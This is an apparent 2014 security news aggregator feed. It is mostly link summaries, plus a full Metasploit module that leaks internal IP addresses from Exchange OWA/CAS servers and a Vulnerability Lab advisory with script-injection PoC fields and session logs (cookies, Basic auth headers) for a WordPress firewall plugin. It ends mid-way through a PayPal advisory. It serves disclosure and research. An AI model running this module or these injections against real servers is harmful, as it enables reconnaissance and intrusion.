Organised Crime Groups Exploiting Hidden Internet Online Criminal Service Industry

September 29, 2014, 3:17 am

≫ Next: Reverse Engineering Wireless Pro Studio Lighting

≪ Previous: Update: XORSearch With Shellcode Detector

The 2014 iOCTA (Internet Organised Crime Threat Assessment), published today by Europol's European Cybercrime Centre (EC3), describes an increased commercialisation of cybercrime.

A service-based criminal industry is developing, in which specialists in the virtual underground economy develop products and services for use by other criminals. This 'Crime-as-a-Service' business model drives innovation and sophistication, and provides access to a wide range of services that facilitate almost any type of cybercrime. The iOCTA report highlights that, as a consequence, entry barriers into cybercrime are being lowered, allowing those lacking technical expertise - including traditional organised crime groups - to venture into cybercrime by purchasing the skills and tools they lack.

more here............https://www.europol.europa.eu/content/organised-crime-groups-exploiting-hidden-internet-online-criminal-service-industry

↧

Reverse Engineering Wireless Pro Studio Lighting

September 29, 2014, 8:14 am

≫ Next: Signed CryptoWall delivered via widespread

≪ Previous: Organised Crime Groups Exploiting Hidden Internet Online Criminal Service Industry

At Zoetrope we always want to make sure our photos look as good as possible, this means ensuring the lighting is perfect for every shot. We currently use a number of Lencarta UltraPro 300 studio strobes to light our photos but in some cases, the power of the flashes needs to be adjusted on the fly to improve the lighting on a particular object. Fortunately, there's a wireless remote which works with our flashes to adjust their power (amongst other things). Since we try to automate as much as possible, we decided to see if we could reverse engineer the remote and control the flashes from our hardware.

more here..........http://zoetrope.io/tech-blog/reverse-engineering-wireless-pro-studio-lighting

↧

Signed CryptoWall delivered via widespread

September 29, 2014, 8:16 am

≫ Next: Introducing Universal SSL

≪ Previous: Reverse Engineering Wireless Pro Studio Lighting

This evening, Barracuda Labs’ URL analysis system detected drive-by downloads originating from five Alexa top-ranked websites: hindustantimes[.]com, bollywoodhungama[.]com, one[.]co[.]il, codingforums[.]com, and mawdoo3[.]com.

more here..........https://barracudalabs.com/2014/09/signed-cryptowall-distributed-via-widespread-malvertising-campaign/

↧

Introducing Universal SSL

September 29, 2014, 8:23 am

≫ Next: Paper: The SPEKE Protocol Revisited

≪ Previous: Signed CryptoWall delivered via widespread

The team at CloudFlare is excited to announce the release of Universal SSL™. Beginning today, we will support SSL connections to every CloudFlare customer, including the 2 million sites that have signed up for the free version of our service.

more here.........https://blog.cloudflare.com/introducing-universal-ssl/

↧

Paper: The SPEKE Protocol Revisited

September 29, 2014, 10:18 am

≫ Next: Microsoft Exchange IIS HTTP Internal IP Address Disclosure

≪ Previous: Introducing Universal SSL

In a forthcoming paper (to be presented at SSR’14), we (with Siamak Shahandashti) present some new attacks on SPEKE, an internationally standardized protocol. The idea originated from a causal chat over coffee with my colleague, Siamak Shahandashti, four days before the SSR’14 submission deadline. But the idea was interesting enough (to us) that we decided to write a paper. It was intensive a few days’ work, but it turned out to an enjoyable experience.

more here.........https://blogs.ncl.ac.uk/security/2014/09/29/the-speke-protocol-revisited/

↧

Microsoft Exchange IIS HTTP Internal IP Address Disclosure

September 29, 2014, 10:24 am

≫ Next: Generic Keylogger Detection with Joe Sandbox X

≪ Previous: Paper: The SPEKE Protocol Revisited

# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

def initialize
super(
'Name' => 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 2013 servers.
},
'Author' =>
[
'Nate Power'
],
'DisclosureDate' => 'Aug 01 2014',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'SSL' => true
}
)

register_options(
[
OptInt.new('TIMEOUT', [ true, "HTTP connection timeout", 10]),
OptInt.new('RPORT', [ true, "The target port", 443]),
], self.class)
end

def run_host(target_host)
rhost = target_host
print_status("#{msg} Checking HTTP headers")
get_ip_extract
end

def get_ip_extract
urls = ["/Microsoft-Server-ActiveSync/default.eas",
"/Microsoft-Server-ActiveSync",
"/Autodiscover/Autodiscover.xml",
"/Autodiscover",
"/Exchange",
"/Rpc",
"/EWS/Exchange.asmx",
"/EWS/Services.wsdl",
"/EWS",
"/ecp",
"/OAB",
"/OWA",
"/aspnet_client",
"/PowerShell"]

result = nil

urls.each do |url|
begin
res = send_request_cgi({
'version' => "1.0",
'uri' => "#{url}",
'method' => 'GET',
'vhost' => ''
}, timeout = datastore['TIMEOUT'])

rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
print_error("#{msg} HTTP Connection Failed")
next
end

if not res
print_error("#{msg} HTTP Connection Timeout")
next
end

if res and res.code == 401 and (match = res['WWW-Authenticate'].match(/Basic realm=\"(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\"/i))
result = match.captures[0]
print_status("#{msg} Status Code: 401 response")
print_status("#{msg} Found Path: " + url )
print_good("#{msg} Found target internal IP address: " + result)
return result
elseif
print_warning("#{msg} No internal address found")
next
end

if res and (res.code > 300 and res.code < 310) and (match = res['Location'].match(/^http[s]:\/\/(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\//i))
result = match.captures[0]
print_status("#{msg} Status Code: #{res.code} response")
print_status("#{msg} Found Path: " + url )
print_good("#{msg} Found target internal IP address: " + result)
return result
elseif
print_warning("#{msg} No internal address found")
next
end
end

if result.nil?
print_warning("#{msg} Nothing found")
end

return result
end
def msg
"#{rhost}:#{rport} -"
end
end

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

↧

Generic Keylogger Detection with Joe Sandbox X

September 29, 2014, 10:40 am

≫ Next: Disarming EMET v5.0

≪ Previous: Microsoft Exchange IIS HTTP Internal IP Address Disclosure

In our last blog post we have demonstrated some of the features of our new product Joe Sandbox X by analyzing the recent malware "xslcmd" (MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1). It has been extensively shown how the malware installs itself and that one of its core payload is a keylogger.

In this post, two new cool features are presented

more here..........http://joe4security.blogspot.com/2014/09/generic-keylogger-detection-with-joe.html

↧

Disarming EMET v5.0

September 29, 2014, 3:53 pm

≫ Next: PE Trick #1: A Codeless PE Binary File That Runs

≪ Previous: Generic Keylogger Detection with Joe Sandbox X

In our previous Disarming Emet 4.x blog post, we demonstrated how to disarm the ROP mitigations introduced in EMET 4.x by abusing a global variable in the .data section located at a static offset. A general overview of the EMET 5 technical preview has been recently published here. However, the release of the final version introduced several changes that mitigated our attack and we were curious to see how difficult it would be to adapt our previous disarming technique to this new version of EMET. In our research we targeted 32-bit systems and compared the results across different operating systems (Windows 7 SP1, Windows 2008 SP1, Windows 8, Windows 8.1, Windows XP SP3 and Windows 2003 SP2). We chose to use the IE8 ColspanID vulnerability once again in order to maintain consistency through our research.

more here..............http://www.offensive-security.com/vulndev/disarming-emet-v5-0/

↧

PE Trick #1: A Codeless PE Binary File That Runs

September 30, 2014, 2:55 am

≫ Next: Private Photo Vault: Not So Private

≪ Previous: Disarming EMET v5.0

One of the annoying things of my Windows Internals/Security research is when every single component and mechanism I’ve looked at in the last six months has ultimately resulted in me finding very interesting design bugs, which I must now wait on Microsoft to fix before being able to talk further about them. As such, I have to take a smaller break from kernel-specific research (although I hope to lift the veil over at least one issue at the No Such Conference in Paris this year). And so, in the next following few blog posts, probably inspired by having spent too much time talking with my friend Ange Albertini, I’ll be going over some neat PE tricks.

more here.........http://www.alex-ionescu.com/?p=211

↧

Private Photo Vault: Not So Private

September 30, 2014, 2:56 am

≫ Next: Firewall Evasion with ICMP (PingTunnel)

≪ Previous: PE Trick #1: A Codeless PE Binary File That Runs

One of the most popular App Store applications, Private Photo Vault (Ultimate Photo+Video Manager) claims over 3 million users, and that your photos are “100% private”. The application, however, stores its data files without using any additional protection or encryption than any other files stored on the iPhone. With access to an unlocked device, a pair record from a seized desktop machine, or possibly even just a copy of a desktop or iCloud backup, all of the user’s stored images and video can be recovered and read in cleartext.

more here.........http://www.zdziarski.com/blog/?p=3951

↧

Firewall Evasion with ICMP (PingTunnel)

September 30, 2014, 2:59 am

≫ Next: Redpoint: Schneider/Modicon PLC Enumeration

≪ Previous: Private Photo Vault: Not So Private

Most networks today use a network based access control system to permit certain traffic and deny others. Since the inception of firewalls and web filters users (and malware) working behind them have strived to bypass the firewalls in order to do whatever it is they want to do.

Tunneling is a very common and effective way to bypass access control systems. Tunneling techniques can be used to bypass firewalls, Network Intrusion Prevention Systems, Web Security Gateways, and WiFi sign in pages.

more here............http://stephenperciballi.blogspot.com/2014/09/firewall-evasion-with-icmp-pingtunnel.html

↧

Redpoint: Schneider/Modicon PLC Enumeration

September 30, 2014, 3:01 am

≫ Next: AES-256 Is Not Enough: Breaking a Bootloader

≪ Previous: Firewall Evasion with ICMP (PingTunnel)

Our Stephen Hilt released another Project Redpoint script as part of his DerbyCon presentation on Sunday. Modicon-info.nse will identify PLC’s and other Schneider Electric/Modicon devices on the network and then enumerates the device.

The script pulls information that would be helpful in maintaining an inventory as well as assessing the security status of the device, such as types of Ethernet, CPU modules and memory cards as well as the firmware version.

more here..........http://www.digitalbond.com/blog/2014/09/29/redpoint-schneidermodicon-plc-enumeration/

↧

AES-256 Is Not Enough: Breaking a Bootloader

September 30, 2014, 3:03 am

≫ Next: Analysis of code4HK

≪ Previous: Redpoint: Schneider/Modicon PLC Enumeration

I'd been pushing hard trying to get a demo of how you can break an AES-256 bootloader. This type of bootloader is often used in products for protecting firmware updates and a good demonstration of why you should care about side channel attacks as an embedded engineer.

It's not pretty but it does work, so I wanted to put some documentation and details up here.

more here..........http://hackaday.io/project/956/log/10108-aes256-is-not-enough-breaking-a-bootloader

↧

Analysis of code4HK

September 30, 2014, 3:07 am

≫ Next: All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability

≪ Previous: AES-256 Is Not Enough: Breaking a Bootloader

Tools
Baksmali: An assembler/disassembler for the dex format used by dalvik
Droidbox: A dynamic sandbox, to perform dynamic analysis of Android applications
Android SDK: Android software development kit
Static analysis

Code4HK is an Android spyware application which is designed to do mass surveillance.

more here..........http://www.malware.lu/articles/2014/09/29/analysis-of-code4hk.html

↧

All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability

September 30, 2014, 8:08 am

≫ Next: PayPal Inc Bug Bounty #71 PPM - Persistent Filter Vulnerability

≪ Previous: Analysis of code4HK

Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325

Release Date:
=============
2014-09-29

Vulnerability Laboratory ID (VL-ID):
====================================
1327

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a
security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website
security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces
security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security
practices and techniques.

(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.

Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service.

The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the 404 detection redirect url input field and the execution occurs in the same section
next to the input field context that gets displayed again.

The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module.
Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section
next to the input field context that gets displayed again.

The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Vulnerable Parameter(s):
[+] 404 detection redirect url
[+] file name error logs url

Affected Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System

Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or
medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and
steps below to continue.

PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )

<tr valign="top">
<th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\"
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
<span class="description">A blocked visitor will be automatically redirected to this URL.</span>
</td>
</tr>
</table>
<input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />

</form>
</div></div>
<div class="postbox">
<h3><label for="title">404 Event Logs</label></h3>
<div class="inside">
<form id="tables-filter" method="post">

<input type="hidden" name="page" value="aiowpsec_firewall" />
<input type="hidden" name="tab" value="tab6" /> 
<input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer"
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div class="tablenav top">

<div class="alignleft actions">
<select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")" />
</div>
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
<a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span>
<a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
<br class="clear" />
</div>

--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:21 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[8095]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]

-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:22 GMT]
Content-Type[text/html]
Content-Length[557]
Connection[keep-alive]
Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
Etag["4ea065b-3c6-4dcad48e5901e"]
Accept-Ranges[bytes]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Powered-By[PleskLin]

Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0

1.2
The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium
user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: FileSystem Components > Host System Logs

<div class="inside">
<p>Please click the button below to view the latest system logs:</p>
<form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
<div>Enter System Log File Name:
<input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
<span class="description">Enter your system log file name. (Defaults to error_log)</span>
</div>
<div class="aio_spacer_15"></div>
<input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit">
<span style="display: none;" class="aiowps_loading_1">
<img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt="">
</span>
</form>
</div>

--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Content-Length[109]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
interval[60]
_nonce[176fea481c]
action[heartbeat]
screen_id[wp-security_page_aiowpsec_filesystem]
has_focus[false]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:44 GMT]
Content-Type[application/json; charset=UTF-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Robots-Tag[noindex]
x-content-type-options[nosniff]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]

Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:54 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[6136]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]

Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module.
The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module.
Restrit the input and handle malicious context with a own secure eception handling to prevent further POSt injection attacks.

Security Risk:
==============
The security risk of the POSt inject web vulnerabilities in the firewall module are estimated as medium.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:   www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:   admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:   dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:   vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

↧

PayPal Inc Bug Bounty #71 PPM - Persistent Filter Vulnerability

September 30, 2014, 8:09 am

≫ Next: PayPal Inc Bug Bounty #59 - Persistent Mail Encoding Vulnerability

≪ Previous: All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability

Document Title:
===============
PayPal Inc Bug Bounty #71 PPM - Persistent Filter Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=870

PayPal Security UID: Roc83bl

Release Date:
=============
2014-09-24

Vulnerability Laboratory ID (VL-ID):
====================================
870

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
